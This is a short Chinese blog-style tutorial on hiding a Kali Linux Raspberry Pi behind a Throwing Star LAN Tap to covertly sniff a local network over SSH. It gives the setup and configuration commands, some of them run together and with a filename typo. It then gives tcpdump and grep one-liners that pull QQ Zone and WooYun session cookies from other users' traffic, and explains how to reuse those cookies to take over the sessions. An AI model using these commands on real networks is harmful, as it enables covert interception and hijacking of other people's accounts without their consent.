继续折腾Raspberry Pi.
The use of the installation of Kali Linux Pi and Throwing Star LAN Tap.
使用安装了Kali linux的树莓派和Throwing Star LAN Tap,能够更加隐蔽的进行内网数据嗅探.
0x0
一个安装了kali linux的树莓派
windows笔记本
2短根网线
一个Throwing Star LAN Tap
usb无线网卡
移动电源
0x1
笔记本创建wifi热点
配置树莓派无线网络
ifconfig wlan0 up
sudo apt-get install wpasupplicant
sudo nano /etc/wpa.cof
network={ssid="创建的WIFI的SSID"proto=RSNkey_mgmt=WPA-PSKpairwise=CCMP TKIPgroup=CCMP TKIPpsk="WIFI密码"}
sudo nano /etc/network/interfaces
auto lo
iface lo inet loopbackiface eth0 inet dhcp
allow-hotplug wlan0iface wlan0 inet manualwpa-roam /etc/wpa.conf
安装tcpdump
apt-get install tcpdump
reboot
0x2
0x3
电脑ssh连Pi
ifconfig eth0 up 默认eth0是不启用的
执行 tcpdump -XvvennSs 0 -i eth0
即可抓到所有http数据包
后续:
优化整个过程,
执行
tcpdump -XvvennSs 0 -i eth0 | cut -b 52- | grep -A 18 -E 'pt2gguin' 即可抓到qq空间的cookie
执行
tcpdump -XvvennSs 0 -i eth0 | cut -b 52- | grep -A 22 -E 'Hm_lvt_' 即可抓到wooyun的cookie
获取到的cookie中,在每个参数前都会有个“.” 删除 "." 就可以利用这个cookie